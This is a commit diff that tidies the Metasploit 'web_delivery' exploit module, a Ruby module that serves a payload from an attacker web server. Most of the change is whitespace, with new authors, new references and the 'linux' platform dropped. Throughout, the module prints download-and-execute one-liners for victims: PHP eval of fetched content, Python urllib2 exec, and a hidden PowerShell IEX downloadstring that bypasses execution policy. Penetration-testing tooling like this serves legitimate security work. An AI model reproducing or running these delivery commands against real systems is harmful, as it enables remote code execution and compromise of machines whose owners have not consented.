Tidy

2014-06-03 14:21:13 -04:00 · 2014-06-03 14:21:13 -04:00 · fdfd7f410d
parent 392b383c2c
commit fdfd7f410d
1 changed files with 33 additions and 28 deletions
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@ -26,7 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
      'Author'	 =>
        [
          'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
-          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
+          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
+          'Ben Campbell',
+          'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
        ],
      'DefaultOptions' =>
                                {
@ -34,28 +36,31 @@ class Metasploit3 < Msf::Exploit::Remote
                                },
      'References'	 =>
        [
-          [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html']
+          [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
+          [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
+          [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+          [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
        ],
-      'Platform'       => %w{ py php win linux},
+      'Platform'       => %w{ py php win},
      'Targets'        =>
-  	[
-		[ 'Automatic', { } ],
-	],
+        [
+              [ 'Automatic', { } ],
+        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'N/A'
-	))
-	  register_options(
+       ))
+           register_options(
      [
        OptString.new('SCRIPT_LANG',  [true, 'Scripting Language to use: PY, PHP, or PSH,', 'PY']),
      ], self.class)
-	end
+         end

  def on_request_uri(cli, request)
    print_status("Delivering Payload")
    if (datastore['SCRIPT_LANG'] == "PSH")
-	data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+        data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
    else
-    	data = %Q|#{payload.encoded} |
+        data = %Q|#{payload.encoded} |
    end
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
  end
@ -64,30 +69,30 @@ class Metasploit3 < Msf::Exploit::Remote
    url = get_uri()
    p = datastore['Payload']
    if (datastore['SCRIPT_LANG'] == "PHP")
-	if (p[0..2] == "php")
-        	print_status("Run the following command on the target machine:")
-		print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"")
-        	print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"")
-	else
-		print_error("Payload currently unsupported by PHP. You will need to use a native PHP payload, such as php/meterpreter")
-		return
-	end
+        if (p[0..2] == "php")
+                print_status("Run the following command on the target machine:")
+                print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"")
+                print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"")
+        else
+                print_error("Payload currently unsupported by PHP. You will need to use a native PHP payload, such as php/meterpreter")
+                return
+        end
    elsif (datastore['SCRIPT_LANG'] == "PY")
        if (p[0..5] == "python")
                print_status("Run the following command on the target machine:")
                print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
-		print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
+                print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
        else
                print_error("Payload currently unsupported by Python. You will need to use a native python payload, such as python/meterpreter")
                return
-	end
+        end
    elsif (datastore['SCRIPT_LANG'] == "PSH")
-	download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-    	print_status("Run the following command on the target machine:")
-    	print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+        download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
+        print_status("Run the following command on the target machine:")
+        print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
    else
-	print_error("You did not specify a valid scripting language. Exiting...")
-	return
+        print_error("You did not specify a valid scripting language. Exiting...")
+        return
    end
-  end  
- end 
+  end
+ end